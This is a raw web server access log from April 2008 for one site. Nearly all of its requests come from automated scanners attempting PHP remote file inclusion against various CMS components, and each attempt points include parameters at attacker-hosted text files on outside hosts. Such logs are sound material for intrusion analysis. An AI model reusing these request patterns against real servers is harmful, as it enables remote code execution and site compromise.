212.227.60.6 - - [01/Apr/2008:08:27:17 -0700] "GET //redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [01/Apr/2008:08:27:30 -0700] "GET /logs//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:50 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:50 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:51 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:54 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:54 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:27:55 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
189.19.255.240 - - [01/Apr/2008:08:28:13 -0700] "GET /logs/access_080305.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:28:26 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:28:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:28:30 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:28:43 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:28:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:28:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:28:43 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:28:44 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:28:50 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:28:51 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:28:58 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:28:58 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:28:59 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:05 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:06 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:29:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:29:25 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:29:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:29:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:29:32 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.175 - - [01/Apr/2008:08:29:47 -0700] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:29:47 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:30:19 -0700] "GET /logs///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:30:20 -0700] "GET ///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.7.93 - - [01/Apr/2008:08:31:19 -0700] "GET /bikes/?D=D HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:31:28 -0700] "GET /logs/includes/header_simple.php?_CONFIG[skin_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:31:28 -0700] "GET /includes/header_simple.php?_CONFIG[skin_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:31:31 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:31:44 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:31:45 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:31:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:31:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.195.52.86 - - [01/Apr/2008:08:32:03 -0700] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:08:32:21 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:08:32:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:08:32:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:32:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:32:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.171.66.229 - - [01/Apr/2008:08:32:29 -0700] "GET //index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:08:32:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:08:33:01 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.121 - - [01/Apr/2008:08:33:07 -0700] "GET //index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:33:08 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:33:08 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:33:09 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:33:25 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:33:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:33:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:33:34 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:33:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:33:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:33:44 -0700] "GET /logs/access_080215.log////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:08:33:47 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:08:33:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:08:33:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:08:34:02 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:34:05 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:08:34:07 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:08:34:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:08:34:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:34:20 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:34:20 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:34:20 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.195.44.102 - - [01/Apr/2008:08:34:26 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:34:42 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:34:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:08:34:53 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:08:34:53 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:08:34:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:07 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.193 - - [01/Apr/2008:08:35:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
80.67.27.193 - - [01/Apr/2008:08:35:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:35:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:17 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:18 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:35:24 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:35:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:35:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:35:26 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:35:26 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:35:27 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:28 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:35:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:35:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:52 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:35:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
